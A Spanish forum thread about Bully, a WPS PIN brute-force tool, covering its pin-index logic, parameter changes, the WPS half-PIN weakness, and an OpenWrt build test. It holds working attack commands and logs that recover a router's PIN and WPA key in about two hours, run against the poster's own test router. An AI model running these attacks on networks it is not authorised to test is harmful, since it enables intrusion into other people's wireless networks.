Autor Tema: BULLY: Mejoras, bugs, aclaraciones, etc.  (Leído 79946 veces)

0 Usuarios y 1 Visitante están viendo este tema.

alist3r

  • Visitante
BULLY: Mejoras, bugs, aclaraciones, etc.
« en: 03-09-2013, 14:39 (Martes) »
EDIT 6 oct 2013:

Por favor, cuando informéis de posibles errores en BULLY, deberíais incluir los siguientes datos:

marca y modelo de dispositivo wifi utilizado. si es interno de un portatil, indicad marca y modelo de portatil.

el comando exacto que se está usando para lanzar bully

versión de bully (bully -V)

si el adaptador es PCI, adjuntad la salida del siguiente comando:
lspci -vvnnk
(solo la parte referente a vuestro adaptador, si aparece)

si el adaptador es USB (tanto externo como interno), adjuntad la salida del siguiente comando:
lsusb -v
(solo la parte referente a vuestro adaptador, si aparece)

si el adaptador es USB (tanto externo como interno), adjuntad la salida del siguiente comando:
lsmod

En caso de que no aportéis todos estos datos, se hace prácticamente imposible poder ayudaros a resolver vuestros problemas de uso o encontrar errores en el código.

Gracias
alist3r



Mensaje original:
Llevo unos dias hablando con Brian Purcel, el creador de Bully.

Todo empezó porque algunos usuarios detectaron un comportamiento extraño en bully. No podían configurar bully para atacar directamente a un PIN determinado.

Empecé a modificar el código de bully, comentar con Brian, debatir ideas, comprender su manera de pensar, etc.

Brian hizo bully inicialmente con la idea de ponerlo dentro de una fonera, y se enfocó en darle al programa las máximas capacidades de "resume" posibles, dado que la fonera se bloquea con frecuencia debido al calor, y el ataque se interrumpe.

PIN Vs PIN INDEX

Para darle a bully las "resume capabilities" de las que hablo, brian ideó un concepto llamado "pin index" (índice de pin).

lo explico:

Lo que hace bully básicamente es escribir en el directorio de trabajo un archivo de texto con todos los pins posibles. Por defecto, bully escribe estos pins de forma aleatoria. Por ejemplo:

Código: [Seleccionar]
7485932x
1495904x
3952902x
...

y tambien guarda información sobre la sesión de ataque mientras lo realiza.
Aquí es donde aparece el concepto de "pin index" comentado antes.
Lo que hace bully es procesar el fichero de pins aleatorios (que se crea al principio de la sesion), y empezar a probar los pins linea por linea.

De esta manera, cada PIN escrito en el archivo de pins, tiene lo que se llama un "pin index" que se corresponde con el número de linea donde está (NO se corresponde en absoluto con el PIN propiamente dicho!!!! es importante comprender la diferencia entre PIN y PIN INDEX, porque eso es lo que ha hecho que muchos usuarios no obtuvieran el resultado esperado usando bully).
Siguiendo el ejemplo anterior:

Código: [Seleccionar]
Pin Index - Pin
1 - 7485932x
2 - 1495904x
3 - 3952902x
...

Cuando bully se interrumpe, guarda el PIN INDEX por donde iba, para poder retomar el trabajo desde donde lo dejó. En la siguiente ejecución de bully, si este detecta un archivo de PINs, retoma el trabajo desde el último PIN INDEX que comprobó.

De esta manera Brian no renuncia a su deseo de probar los PINs alateatoriamente, pero tampoco renuncia a la posibilidad del realizar un "resume", cosa que de otro modo pareceria imposible usando PINs aleatorios.

El parámetro -p es sólo para el (extraño, improbable) caso de que el usuario quiera forzar de algún modo la posición del fichero desde la que hay que recomenzar. NO PARA EMPEZAR DESDE UN DETERMINADO PIN.

Brian reconoce que la utilidad de usar -p en un fichero que tiene PINs aleatorios es, cuanto menos, limitada. Es poco probable que nos pueda servir de algo, pero ahí está la opción para quien quiera usarla.

Cuando usamos el parámetro -p en bully, NO LE ESTAMOS DICIENDO EL PIN INICIAL QUE DEBE USAR. En su lugar, le estamos diciendo PIN INDEX inicial. Siguiendo el ejemplo anterior, si ejecutamos

Código: [Seleccionar]
bully xxxx -p 0000003 xxxx

el PIN que bully comprobará será el 3952902x
(es decir, EL TERCER PIN del fichero de PINs que se escribió aleatoriamente al principio del ataque)


Cómo usar bully para probar un PIN determinado

Bully ofrece el parámetro -S para utilizar una lista de numeros secuenciales, en lugar de una lista de numeros aleatorios. Cuando se pasa este parámetro, el PIN INDEX COINCIDE CON EL PIN:

Código: [Seleccionar]
Pin Index - Pin
1 - 0000001x
2 - 0000002x
3 - 0000003x
...
1234567 - 1234567x
...
9999999 - 9999999x

de este modo, bully probará exactamente el PIN que estamos deseando que pruebe.

en esta situación (pines secuenciales), el parámetro -p cobra mucho más protagonismo y utilidad que en el caso anterior (pines aleatorios). Combinando -S y -p se puede pedir a bully que pruebe determinado PIN directamente, para usar con routers de los cuales conocemos el pin de antemano (o la primera mitad)

Por ejemplo, si sabemos que el PIN es 1234567x podemos usar:

Código: [Seleccionar]
bully -S -p 1234567
y si sabemos que el PIN empieza por 6869xxxx, podemos usar:

Código: [Seleccionar]
bully -S -p 6869000
(nótese que, de momento, bully calcula los WPS pin por nosotros y por tanto no necesita 8 digitos sino siete. Ya le he comentado a Brian que cambie eso porque hay routers violando el estandar y la única forma de Auditar sus WPS PINs es dejando de calcular el checksum. En proximas versiones se intentará cambiar esto.)

Esto explica el "problema" que tenían algunos usuarios ejecutando bully, y que a pesar de mis modificaciones en el código, ha resultado ser mejor una conversación con Brian, que ha reconocido que el problema viene dado por un diseño muy diferente a lo conocido, junto con la ausencia de manuales y documentación correcta.

Brian reconoce que el acercamiento de probar los PINs aleatoriamente no tiene, necesariamente, una utilidad especifica, y que ciertamente no sirve para evitar ser detectados como atacantes por fuerza bruta. Sin embargo, quiere conservar este modo de funcionamiento como el modo por defecto, ya que aporta cierto sentido de "juego" cuando no sabes qué PIN es el válido para un determinado router.

Como ya sabemos, limitarse a probar aleatoriamente entre 9999999 combinaciones no aprovecharia uno de los mayores fallos de diseño que tiene el WPS PIN, y es que se pueden averiguar los 4 primeros dígitos sin tener que acertar el resto del pin.  Esto implicaria una pérdida de rendimiento considerable frente a reaver, que sí detecta y bloquea la primera mitad del PIN cuando la consigue.

En este sentido, y a pesar de que utiliza pines aleatorios, bully tambien tiene esto en cuenta. Si encuentra la primera mitad de pin correcta, la fija.

Pensaremos en cómo rediseñar bully para que incorpore algunas de las cosas buenas que tiene reaver y otras nuevas.
 
iré ampliando este hilo con la informacion de nuestras charlas, que podeis ver aqui:
https://github.com/bdpurcell/bully/pull/9#issuecomment-23679393


« Última modificación: 06-10-2013, 01:25 (Domingo) por alister »

Desconectado jar229

  • Colaborador
  • *
  • Mensajes: 4604
Re: BULLY para tontos | BULLY for dummies
« Respuesta #1 en: 04-09-2013, 07:03 (Miércoles) »
Tema muy interesante. Estaremos atentos  ;D

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #2 en: 04-09-2013, 11:28 (Miércoles) »
Brian esta pensando en fusionar las caracterisitcas de esos scripts que se hacen por los foros, junto con su programa. Es decir, que bully detecte la mac, y si el pin es conocido o semiconocido, probarlo directo.


Tambien quiere saber cómo os va el bully en plataformas embebidas. Alguien lo quiere probar y contarnos algo? Se hizo para foneras y cosas similares.

Tenemos alguna idea más, pero habra que ir machacando. Tenemos el github que parece una fiesta xD
https://github.com/bdpurcell/bully/pull/9#issuecomment-23753432
Colaboradores bienvenidos!
« Última modificación: 04-09-2013, 11:29 (Miércoles) por alister »

Desconectado jar229

  • Colaborador
  • *
  • Mensajes: 4604
Re: BULLY para tontos | BULLY for dummies
« Respuesta #3 en: 04-09-2013, 11:39 (Miércoles) »
Yo tengo pendiente de probarlo en OpenWrt  >:D

Las instrucciones para compilarlo están probadas (según dice en su web) en Kamikaze.  Así que no tengo claro que funcionen en la actual rama Barrier Braker ...  ^-^

A ver si saco tiempo, lo pruebo y si se plantean problemas o dudas ... aviso  ;)

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #4 en: 04-09-2013, 12:25 (Miércoles) »
Ah!Y mi traducción ha pasado a la version oficial para compilarse como bully.es :D

goyfilms

  • Visitante
Re: Re: Re: BULLY para tontos | BULLY for dummies
« Respuesta #5 en: 04-09-2013, 22:06 (Miércoles) »
Ah!Y mi traducción ha pasado a la version oficial para compilarse como bully.es :D
Genial! Enhorabuena! Viva el software en español!
Espero y deseo que esta herramienta progrese. Sería bueno tener una alternativa decente al estancado y mejorable reaver.

Enviado desde el móvil

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #6 en: 04-09-2013, 22:09 (Miércoles) »
Brian empezó bully durante una etapa desempleado, y ahora curra mucho. Y yo tampoco voy sobrao de tiempo, pero le he ametrallado con ideas y con feedback recogido de los foros españoles, y se ha motivado :D
Iremos viendo

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 15457
Re: BULLY para tontos | BULLY for dummies
« Respuesta #7 en: 05-09-2013, 04:49 (Jueves) »
Acabo de bajar bully del svn , y se ha actualizado de la revision 11 a revision 12.

A ver si veo un changelog o algo.

Ya lo encontre , un cambio menor, por asi decirlo , que no afecta al funcionamiento.

Log message

Fixed issue #10, Makefile updated

Affected files
    expand all   collapse all
   Modify   /trunk/src/Makefile   diff
   

   1    +    prefix = /usr/local
   2    +    exec_prefix = $(prefix)
   3    +    bindir = $(exec_prefix)/bin
   4    +    

« Última modificación: 05-09-2013, 04:52 (Jueves) por USUARIONUEVO »

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #8 en: 05-09-2013, 10:31 (Jueves) »
no, te explico.
brian no puso las variables minimas estandar del makefile. y el make install petaba por eso.
le propuse ese commit y lo aceptó.
la documentación está floja, pero ante la duda preguntame a mi directamente.
el bully.es tambien esta en la cola de commits. no se si ha entrado ya.
« Última modificación: 05-09-2013, 10:31 (Jueves) por alister »

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #9 en: 05-09-2013, 10:42 (Jueves) »
EDIT:
brian acaba de empujar esto, que refleja nuestras charlas de la semana:

Citar
Intent: Eliminate confusion arising from the fact that the argument to --pin is a pin number when --sequential (-S) is used, and an index into the pseudorandom pin file otherwise.

Changes: When --pin (-p) is provided, default to --sequential (-S), and print a message. Add a new argument, --index number (-i). If -S is used in conjunction with -i, print an error message.

Notes: The default run mode for bully will continue to be "pseudorandom". Other proposed changes include improving the way pin files are generated, and using those enhancements by default will benefit the largest subset of end users.

Desconectado jar229

  • Colaborador
  • *
  • Mensajes: 4604
Re: BULLY para tontos | BULLY for dummies
« Respuesta #10 en: 05-09-2013, 14:06 (Jueves) »
Acabo de compilar Bully para OpenWrt. Lo he incluído en un firmware para el Huawei hg556a con wifi atheros.
Todo correcto sin ningún mensaje de error.

Ahora falta testearlo y ver qué tal funciona >:D

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #11 en: 05-09-2013, 18:57 (Jueves) »
deseando saber mas, jar229.
Brian estará contento de saberlo

Chumpy

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #12 en: 06-09-2013, 02:00 (Viernes) »
Respecto a lo de probar primero los 4 dígitos, ¿No podríamos crear los primeros 10000 pins con los 4 caracteres iniciales distintos?

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 15457
Re: BULLY para tontos | BULLY for dummies
« Respuesta #13 en: 06-09-2013, 02:41 (Viernes) »
Respecto a lo de probar primero los 4 dígitos, ¿No podríamos crear los primeros 10000 pins con los 4 caracteres iniciales distintos?

Son aleatorios ,pero no repite ninguno , por que los va anotando en un fichero.

Desconectado jar229

  • Colaborador
  • *
  • Mensajes: 4604
Re: BULLY para tontos | BULLY for dummies
« Respuesta #14 en: 06-09-2013, 12:03 (Viernes) »
Probado y funcionando ...  ;D

Código: [Seleccionar]
root@OpenWrt:~# bully mon0 -b 38:72:C0:XX:XX:XX -e JAZZTEL_5782 -c 11
[+] Switching interface 'mon0' to channel '11'
[!] Using 'f4:c7:14:XX:XX:XX' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '38:72:c0:XX:XX:XX' on channel '11'
[+] Got beacon for 'JAZZTEL_5782' (38:72:c0:XX:XX:XX)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/38:72:c0:XX:XX:XX.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '61162808'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '70762808'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '30562806'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '77222800'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '34302804'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '14372803'
[+] Rx(M2D/M3) = 'WPSFail'   Next pin '14372803'
[+] Rx(  M1  ) = 'Timeout'   Next pin '14372803'
[+] Rx(  M1  ) = 'Timeout'   Next pin '14372803'
[+] Rx(  M1  ) = 'EAPFail'   Next pin '14372803'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '54382800'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '14072802'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '39742803'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '48132800'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '84482808'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '50082803'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '33122809'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '53302809'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '01522808'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '45432804'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '49092806'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '72832806'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '87562804'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '38812804'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '70212808'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '05612802'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '66822806'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '64082806'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '40052809'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '55792806'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '79492805'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '91312808'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '38242809'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '61102804'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '14092800'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '01952803'
[!] Run time 00:01:03, pins tested 32 (1.96 seconds per pin)
[!] Current rate 1.96 seconds per pin, 10968 pins remaining
[!] Average time to crack is 2 hours, 59 minutes, 8 seconds
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '31862806'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '81252800'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '21942808'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '88962801'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '80032809'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '41022801'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '66552802'

He preparado un router de pruebas, un Comtrend ar5387un con el último firmware de jazztel y le he activado el WPS (por defecto viene desactivado).

El router 'atacante', como ya comenté, es un Huawei hg556a con wifi atheros (kmod-ath9k)


Uso de CPU y memoria:
Código: [Seleccionar]

  CPU[||||||||||||||||||||||||||||||||||||                       55.1%]     Tasks: 14, 0 thr; 1 running
  Mem[|||||||||||||||||||||||||||||||||||||                    19/60MB]     Load average: 0.44 0.50 0.29
  Swp[                                                           0/0MB]     Uptime: 00:11:48

  PID USER      PRI  NI  VIRT   RES   SHR S CPU% MEM%   TIME+  Command
 1229 root       20   0  7684  5780  4784 S 50.0  9.4  3:21.59 bully mon0 -b 38:72:c0:XX:XX:XX -e JAZZTEL_5782 -c 11
 1238 root       20   0  1384   768   580 R  3.2  1.2  0:00.87 htop
  899 root       20   0  1224   544   396 S  0.0  0.9  0:03.12 /usr/sbin/dropbear -F -P /var/run/dropbear.1.pid -p 22
 1232 root       20   0  1224   544   396 S  0.0  0.9  0:02.94 /usr/sbin/dropbear -F -P /var/run/dropbear.1.pid -p 22
 

Aunque ya conozco clave y PIN, voy a dejarlo un par de horas a ver si lo saca.

Queréis que haga algún test más ?

Por cierto, por si alguien más quieres probar en OpenWrt, además de bully hace falta instalar, reaver (para usar wash, el escaner de redes con WPS activado), aircrack-ng (para poner la wifi en modo monitor) y wireless-tools (necesarias para usar aircrack-ng).

Chumpy

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #15 en: 06-09-2013, 12:08 (Viernes) »


Como ya sabemos, limitarse a probar aleatoriamente entre 9999999 combinaciones no aprovecharia uno de los mayores fallos de diseño que tiene el WPS PIN, y es que se pueden averiguar los 4 primeros dígitos sin tener que acertar el resto del pin.  Esto implicaria una pérdida de rendimiento considerable frente a reaver, que sí detecta y bloquea la primera mitad del PIN cuando la consigue.

En este sentido, y a pesar de que utiliza pines aleatorios, bully tambien tiene esto en cuenta. Si encuentra la primera mitad de pin correcta, la fija.



Quizás no lo he interpretado bien, pero yo he entendido que los pins son aleatorios y si da, de casualidad con un pin que tiene los 4 primeros bien seguirá fijando esos, pero que si no puede repetir los mismos primeros 4 digitos varias veces. Pondré un ejemplo.

Si el pin a buscar es 12345670
y la lista de pins
1 99992689
2 11116598
3 99993654
4 12346985
5 42426898
6 12345670

Según he entendido yo prueba los pins 1,2,3,4 y 6 pues encontrados los 4 primeros dígitos los fija (1234), pero el pin 3 podría no probarlo, pues ya sabe, con el 1 que 9999 no es el comienzo del pin.

Por eso decía que debería programarse para que en los primeros 10000 pins todos comienzos fuesen distintos.

Lo que no se es si lo he entendido mal y no es así como funciona.

Desconectado sanson

  • Moderador Global
  • *
  • Mensajes: 8404
Re: Re: BULLY para tontos | BULLY for dummies
« Respuesta #16 en: 06-09-2013, 12:24 (Viernes) »
Pues le veo una lógica aplastante, yo también lo e entendido como tu .  Buen apunte

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #17 en: 06-09-2013, 12:37 (Viernes) »


Como ya sabemos, limitarse a probar aleatoriamente entre 9999999 combinaciones no aprovecharia uno de los mayores fallos de diseño que tiene el WPS PIN, y es que se pueden averiguar los 4 primeros dígitos sin tener que acertar el resto del pin.  Esto implicaria una pérdida de rendimiento considerable frente a reaver, que sí detecta y bloquea la primera mitad del PIN cuando la consigue.

En este sentido, y a pesar de que utiliza pines aleatorios, bully tambien tiene esto en cuenta. Si encuentra la primera mitad de pin correcta, la fija.



Quizás no lo he interpretado bien, pero yo he entendido que los pins son aleatorios y si da, de casualidad con un pin que tiene los 4 primeros bien seguirá fijando esos, pero que si no puede repetir los mismos primeros 4 digitos varias veces. Pondré un ejemplo.

Si el pin a buscar es 12345670
y la lista de pins
1 99992689
2 11116598
3 99993654
4 12346985
5 42426898
6 12345670

Según he entendido yo prueba los pins 1,2,3,4 y 6 pues encontrados los 4 primeros dígitos los fija (1234), pero el pin 3 podría no probarlo, pues ya sabe, con el 1 que 9999 no es el comienzo del pin.

Por eso decía que debería programarse para que en los primeros 10000 pins todos comienzos fuesen distintos.

Lo que no se es si lo he entendido mal y no es así como funciona.

correcto.

salvo dos ineficiencias:

- el código de bloqueo de la mitad conocida, veces fallaba y seguia randomizandola a pesar de haber sido descubierta. si lo habeis usado un poco, quizas lo habréis notado.

- se randomizan los digitos de la segunda mitad cuando no se sabe la primera, cosa que es un malgasto de cpu y no aporta nada puesto que hay que centrarse aun en los 4 primeros digitos.. esto lo habréis notado todos puesto que es evidente.

estas aclaraciones las dejo para todas aquellas personas que dudaban sobre si bully aprovechaba esta debilidad en el diseño (yo mismo incluido, antes de revisar el codigo)
« Última modificación: 06-09-2013, 12:38 (Viernes) por alister »

alist3r

  • Visitante
Re: BULLY para tontos | BULLY for dummies
« Respuesta #18 en: 06-09-2013, 12:45 (Viernes) »
Probado y funcionando ...  ;D

He preparado un router de pruebas, un Comtrend ar5387un con el último firmware de jazztel y le he activado el WPS (por defecto viene desactivado).

El router 'atacante', como ya comenté, es un Huawei hg556a con wifi atheros (kmod-ath9k)


Uso de CPU y memoria:
Código: [Seleccionar]

  CPU[||||||||||||||||||||||||||||||||||||                       55.1%]     Tasks: 14, 0 thr; 1 running
  Mem[|||||||||||||||||||||||||||||||||||||                    19/60MB]     Load average: 0.44 0.50 0.29
  Swp[                                                           0/0MB]     Uptime: 00:11:48

  PID USER      PRI  NI  VIRT   RES   SHR S CPU% MEM%   TIME+  Command
 1229 root       20   0  7684  5780  4784 S 50.0  9.4  3:21.59 bully mon0 -b 38:72:c0:XX:XX:XX -e JAZZTEL_5782 -c 11
 1238 root       20   0  1384   768   580 R  3.2  1.2  0:00.87 htop
  899 root       20   0  1224   544   396 S  0.0  0.9  0:03.12 /usr/sbin/dropbear -F -P /var/run/dropbear.1.pid -p 22
 1232 root       20   0  1224   544   396 S  0.0  0.9  0:02.94 /usr/sbin/dropbear -F -P /var/run/dropbear.1.pid -p 22
 

Aunque ya conozco clave y PIN, voy a dejarlo un par de horas a ver si lo saca.

Queréis que haga algún test más ?

Por cierto, por si alguien más quieres probar en OpenWrt, además de bully hace falta instalar, reaver (para usar wash, el escaner de redes con WPS activado), aircrack-ng (para poner la wifi en modo monitor) y wireless-tools (necesarias para usar aircrack-ng).


wow! gracias mil. brian se va a poner contento jejeje.
ya nos iras contando qué tal chuta. sobre todo si no calienta mucho la CPU o cosas asi.
las foneras, las freía literalmente! :P

Desconectado jar229

  • Colaborador
  • *
  • Mensajes: 4604
Re: BULLY para tontos | BULLY for dummies
« Respuesta #19 en: 06-09-2013, 14:19 (Viernes) »
En poco más de 2 horas ...  ;D ;D

Código: [Seleccionar]
root@OpenWrt:~# screen -r
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20176914'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20179977'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20172138'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20179120'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20173715'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20176259'
[+] Rx(M2D/M3) = 'WPSFail'   Next pin '20176259'
[+] Rx(  M1  ) = 'Timeout'   Next pin '20176259'
[+] Rx(  M1  ) = 'Timeout'   Next pin '20176259'
[+] Rx(  M1  ) = 'EAPFail'   Next pin '20176259'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20177560'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20174811'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20173586'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20172770'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20177485'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20174064'
[+] Rx(  M7  ) = 'Pin2Bad'   Next pin '20172527'
[*] Pin is '20172527', key is '57F237b5A77736CJ2FF8'
Saved session to '/root/.bully/38:72:c0:XX:XX:XX.run'

        PIN : '2017XXXX'
        KEY : '57F237b5A77736CJXXXX'

Es la clave y el PIN por defecto que pone el router. Yo no le he cambiado nada (a parte de activarle el WPS).

Esto no lo había comentado antes. Ambos routers separados tan sólo por un par de metros, con lo cual la señal recibida es máxima.
« Última modificación: 11-09-2013, 13:03 (Miércoles) por jar229 »